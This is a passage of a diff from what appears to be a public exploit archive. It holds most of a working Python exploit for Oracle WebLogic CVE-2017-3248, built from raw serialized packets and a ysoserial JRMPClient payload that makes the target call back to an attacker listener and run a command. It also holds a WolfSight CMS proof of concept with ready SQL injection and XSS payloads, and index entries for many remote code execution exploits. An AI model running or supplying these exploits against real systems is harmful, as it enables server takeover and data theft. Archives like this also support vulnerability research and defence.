39322e3136382e312e32323700124141414141414141414141413154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3131312e3131312e302e31313161863d1d0000000078'
+#C. Packet 3 to send:
+#C.1 length
+payload_3_1 = "000003b3"
+#C.2 first part
+payload_3_2 = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000'
+#C.3.1 sub payload
+payload_3_3_1 = 'aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
+#C.3.2 Ysoserial Payload generated in real time
+payload_3_3_2 = ""
+#C.4 End of the payload
+payload_3_4 = 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
+
+def runCmd(cmd):
+	proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
+	stdout_value = proc.stdout.read() + proc.stderr.read()
+	return stdout_value
+
+def getJrmpClientPayloadEncoded(attackerIp, attackerJRMPListenerPort, ysoPath):
+	completeCmd = CMD_GET_JRMPCLIENT_PAYLOAD.format(ysoPath, ARGS_YSO_GET_PAYLOD.format(attackerIp, attackerJRMPListenerPort))
+	print "[+] Ysoserial command (JRMP client): {0}".format(repr(completeCmd))
+	stdout = runCmd(cmd = completeCmd)
+	return stdout
+
+def exploit(targetIP, targetPort, attackerIP, attackerJRMPPort, cmd, testOnly=False, payloadType='CommonsCollections5', sslEnabled=False, ysoPath=""):
+	if testOnly == True:
+		attackerIP = "127.0.0.1"
+		attackerJRMPPort = 0
+	print "[+] Connecting to {0}:{1} ...".format(targetIP, targetPort)
+	if sslEnabled == True:
+		print "[+] ssl mode enabled"
+		s = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
+	else:
+		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		print "[+] ssl mode disabled"
+	s.connect((targetIP, targetPort))
+	print "[+] Connected to {0}:{1}".format(targetIP, targetPort)
+	print "[+] Sending first packet..."
+	#print "[S1] Sending {0}".format(repr(payload_1.decode('hex')))
+	s.sendall(payload_1.decode('hex'))
+	data = s.recv(4096)
+	#print '[R1] Received', repr(data)
+	print "[+] Sending second packet..."
+	#print "[S2] Sending {0}".format(repr(payload_2.decode('hex')))
+	s.sendall(payload_2.decode('hex'))
+	data = s.recv(4096)
+	#print '[R2] Received', repr(data)
+	print "[+] Generating with ysoserial the third packet which contains a JRMPClient payload..."
+	payload_3_3_2 = getJrmpClientPayloadEncoded(attackerIp=attackerIP, attackerJRMPListenerPort=attackerJRMPPort, ysoPath=ysoPath)
+	payload= payload_3_1 + payload_3_2 + payload_3_3_1 + payload_3_3_2 + payload_3_4
+	payload = payload.replace(payload_3_1, "0000{:04x}".format(len(payload)/2), 1)
+	sendata = payload.decode('hex')
+	if testOnly == False:
+		print "[+] You have to execute the following command locally:"
+		print "    {0}".format(CMD_YSO_LISTEN.format(ysoPath, attackerJRMPPort, payloadType,cmd))
+		raw_input("[+] Press Enter when this previous command is running...")
+	print "[+] Sending third packet..."
+	#print "[S3] Sending {0}".format(repr(sendata))
+	s.sendall(sendata)
+	data = s.recv(4096)
+	s.close()
+	#print '[R3] Received', repr(data)
+	if testOnly == True:
+		if "cannot be cast to weblogic" in str(data):
+			print "[+] 'cannot be cast to weblogic' string in the third response from server"
+			print "\n{2}\n[-] target {0}:{1} is not vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60)
+		else:
+			print "[+] 'cannot be cast to weblogic' string is NOT in the third response from server"
+			print "\n{2}\n[+] target {0}:{1} is vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60)
+	else:
+		print "[+] The target will connect to {0}:{1}".format(attackerIP, attackerJRMPPort)
+		print "[+] The command should be executed on the target after connection on {0}:{1}".format(attackerIP, attackerJRMPPort)
+
+def main():
+	argsParsed = argparse.ArgumentParser(description=HELP_MESSAGE, formatter_class=RawTextHelpFormatter)
+	argsParsed.add_argument("-t", dest='target', required=True, help='target IP')
+	argsParsed.add_argument("-p", dest='port', type=int, required=True, help='target port')
+	argsParsed.add_argument("--jip", dest='attackerIP', required=False, help='Local JRMP listener ip')
+	argsParsed.add_argument("--jport", dest='attackerPort', type=int, default=3412, required=False, help='Local JRMP listener port (default: %(default)s)')
+	argsParsed.add_argument("--cmd", dest='cmdToExecute', help='Command to execute on the target')
+	argsParsed.add_argument("--check", dest='check', action='store_true', default=False, help='Check if vulnerable')
+	argsParsed.add_argument("--ssl", dest='sslEnabled', action='store_true', default=False, help='Enable ssl connection')
+	argsParsed.add_argument("--ysopath", dest='ysoPath', required=True, default=False, help='Ysoserial path')
+	argsParsed.add_argument("--payloadType", dest='payloadType', default="CommonsCollections5", help='Payload to use in JRMP listener (default: %(default)s)')
+	args = dict(argsParsed.parse_args()._get_kwargs())
+	if os.path.isfile(args['ysoPath'])==False:
+		print "[-] You have to give the path to Ysoserial with --ysopath (https://github.com/frohoff/ysoserial)!"
+		return -1
+	if args['check'] == False and args['attackerIP'] == None:
+		print "[-] You have to give an IP with --jip !"
+		return -1
+	elif args['check'] == False and args['cmdToExecute'] == None:
+		print "[-] You have to give a command to execute on the target with --cmd !"
+		return -1
+	if args['check'] == True:
+		print "[+] Checking if target {0}:{1} is vulnerable to CVE-2017-3248 without executing a system command on the target...".format(args['target'], args['port'])
+		exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=None, attackerJRMPPort=None, cmd=None, testOnly=True, sslEnabled=args['sslEnabled'], ysoPath=args['ysoPath'])
+	else:
+		print "[+] Exploiting  target {0}:{1}...".format(args['target'], args['port'])
+		exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=args['attackerIP'], attackerJRMPPort=args['attackerPort'], cmd=args['cmdToExecute'], payloadType=args['payloadType'], testOnly=False, sslEnabled=args['sslEnabled'],ysoPath=args['ysoPath'])
+
+if __name__ == "__main__":
+	main()

exploits/php/webapps/44997.txt

@@ -0,0 +1,31 @@
+# Exploit Title: WolfSight CMS 3.2 - SQL Injection
+# Google Dork: N/A
+# Date: 2018-07-10
+# Exploit Author: Berk Dusunur & Zehra Karabiber
+# Vendor Homepage: http://www.wolfsight.com
+# Software Link: http://www.wolfsight.com
+# Version: v3.2
+# Tested on: Parrot OS / WinApp Server
+# CVE : N/A
+
+# PoC Sql Injection
+# Parameter: #1* (URI)
+# Type: error-based
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Payload: 
+
+http://www.ip/page1-%bf%bf"-page1/' AND (SELECT 7988 FROM(SELECT COUNT(*),CONCAT(0x717a766a71,(SELECT(ELT(7988=7988,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'WpDn'='WpDn
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 OR time-based blind
+# Payload: 
+
+http://www.ip/page1-%bf%bf"-page1/'OR SLEEP(5) AND 'kLLx'='kLLx
+
+# PoC Cross-Site Scripting
+# http://ip/admin/login.php
+# Username
+
+<IMG SRC=”javascript:alert(‘EZK’);”>
+
+# This vulnerability was identified during bug bounty

files_exploits.csv

@@ -16603,8 +16603,10 @@ id,file,description,date,author,type,platform,port
 44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
 44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows,
 44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081
-44992,exploits/linux/remote/44992.rb,"HID discoveryd - command_blink_on Unauthenticated RCE (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
+44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
 44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
+45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
+45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39627,7 +39629,6 @@ id,file,description,date,author,type,platform,port
 44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
 44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
 44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM  < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
-44970,exploits/linux/webapps/44970.txt,"ModSecurity 3.0.0 - Cross-Site Scripting",2018-07-03,"Adipta Basu",webapps,linux,
 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
 44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,
 44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
@@ -39636,3 +39637,8 @@ id,file,description,date,author,type,platform,port
 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
 44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
 44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
+44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,
+44997,exploits/php/webapps/44997.txt,"WolfSight CMS 3.2 - SQL Injection",2018-07-10,"Berk Dusunur",webapps,php,80
+44998,exploits/multiple/webapps/44998.py,"Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution",2018-07-07,bobsecq,webapps,multiple,
+44999,exploits/linux/webapps/44999.txt,"Elektronischer Leitz-Ordner 10 - SQL Injection",2018-07-10,"Jens Regel",webapps,linux,
+45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,